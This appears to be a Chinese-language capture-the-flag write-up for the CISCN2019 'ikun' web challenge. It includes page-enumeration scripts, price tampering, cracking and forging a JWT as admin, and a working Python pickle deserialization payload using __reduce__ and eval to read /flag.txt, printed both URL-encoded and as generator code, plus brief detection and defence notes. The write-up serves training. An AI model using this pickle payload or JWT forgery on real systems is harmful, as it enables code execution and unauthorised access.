[CISCN2019 华北赛区 Day1 Web2]ikun
发现要先找到lv6 找到lv6的脚本: 1 2 3 4 5 6 7 8 9 import requests url="http://c0fe0b30-9fdd-41ce-b289-8d6630c49212.node5.buuoj.cn:81/shop?page=" for i in range(0,2000): print(i) r=requests.get( url + str(i) ) if 'lv6.png' in r.text: print (i) break
更高级的: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 import threading import time import requests def go(st, ed): for i in range(st, ed): url = 'http://c0fe0b30-9fdd-41ce-b289-8d6630c49212.node5.buuoj.cn:81/shop?page=' url += str(i) r = requests.get(url, timeout=2) if 'lv6.png' in r.text: print(r.url) time.sleep(0.1) if __name__ == '__main__': threads = [] for i in range(0, 10): t = threading.Thread(target=go, args=(i * 20, (i + 1) * 20)) threads.append(t) for item in threads: item.start()
找到在181的页面上:
在进行购买,发现买不起,可以修改金额和折扣来买它,抓包后发现只能通过抓包来修改折扣,修改折扣后给你一个
可以发现有个cookie,猜测是
jwt ,直接复制cookie,再
https://jwt.io
用c-jwt-cracker爆破jwt256-bit-secret
修改成admin将jwt换成该字符串,
登录这个网站ctrl+u,有个源码泄露
知识点:pickle: 提供了一个简单的持久化功能。可以将对象以文件的形式存放在磁盘上。
pickle模块只能在python中使用,python中几乎所有的数据类型(列表,字典,集合,类等)都可以用pickle来序列化, pickle序列化后的数据,可读性差,人一般无法识别。
1 p = pickle.loads(urllib.unquote(become))
1 urllib.unquote:将存入的字典参数编码为URL查询字符串,即转换成以key1 = value1 & key2 = value2的形式pickle.loads(bytes_object): 从字节对象中读取被封装的对象,并返回我看了师傅们的博客之后的理解就是,我们构建一个类,类里面的__reduce__python魔术方法会在该类被反序列化的时候会被调用Pickle模块中最常用的函数为:
1 2 3 4 5 6 pickle.dump(obj, file, [,protocol]) 函数的功能:将obj对象序列化存入已经打开的file中。 参数讲解: obj:想要序列化的obj对象。 file:文件名称。 protocol:序列化使用的协议。如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。
1 2 3 4 pickle.load(file) 函数的功能:将file中的对象序列化读出。 参数讲解: file:文件名称。
1 2 3 4 pickle.loads(string) 函数的功能:从string中读出序列化前的obj对象。 参数讲解: string:文件名称。
1 【注】 dump() 与 load() 相比 dumps() 和 loads() 还有另一种能力:dump()函数能一个接着一个地将几个对象序列化存储到同一个文件中,随后调用load()来以同样的顺序反序列化读出这些对象。而在__reduce__方法里面我们就进行读取flag.txt文件,并将该类序列化之后进行URL编码
检测反序列化方法:
1 2 3 4 5 pickle.dumps(obj[, protocol]) 函数的功能:将obj对象序列化为string形式,而不是存入文件中。 参数讲解: obj:想要序列化的obj对象。 protocal:如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。
1 2 3 4 5 6 pickle.loads(string) 函数的功能:从string中读出序列化前的obj对象。 参数讲解: string:文件名称。 【注】 dump() 与 load() 相比 dumps() 和 loads() 还有另一种能力:dump()函数能一个接着一个地将几个对象序列化存储到同一个文件中,随后调用load()来以同样的顺序反序列化读出这些对象。而在__reduce__方法里面我们就进行读取flag.txt文件,并将该类序列化之后进行URL编码
检测反序列化方法:
1 全局搜索Python代码中是否含有关键字类似“import cPickle”或“import pickle”等,若存在则进一步确认是否调用cPickle.loads()或pickle.loads()且反序列化的参数可控。
防御方法
1 2 1、用更高级的接口__getnewargs()、__getstate__()、__setstate__()等代替__reduce__()魔术方法; 2、进行反序列化操作之前,进行严格的过滤,若采用的是pickle库可采用装饰器实现。
打洞
1 c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.
1 2 3 4 5 6 7 8 9 10 import pickle import urllib class payload(object): def __reduce__(self): return (eval, ("open('/flag.txt','r').read()",)) a = pickle.dumps(payload()) a = urllib.quote(a) print a
__
c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.
Author:
odiws
Permalink:
http://odiws.github.io/2024/05/26/buuctf5%E6%9C%8826%E6%97%A5/
License:
Copyright (c) 2019 CC-BY-NC-4.0 LICENSE
Slogan:
Do you believe in DESTINY ?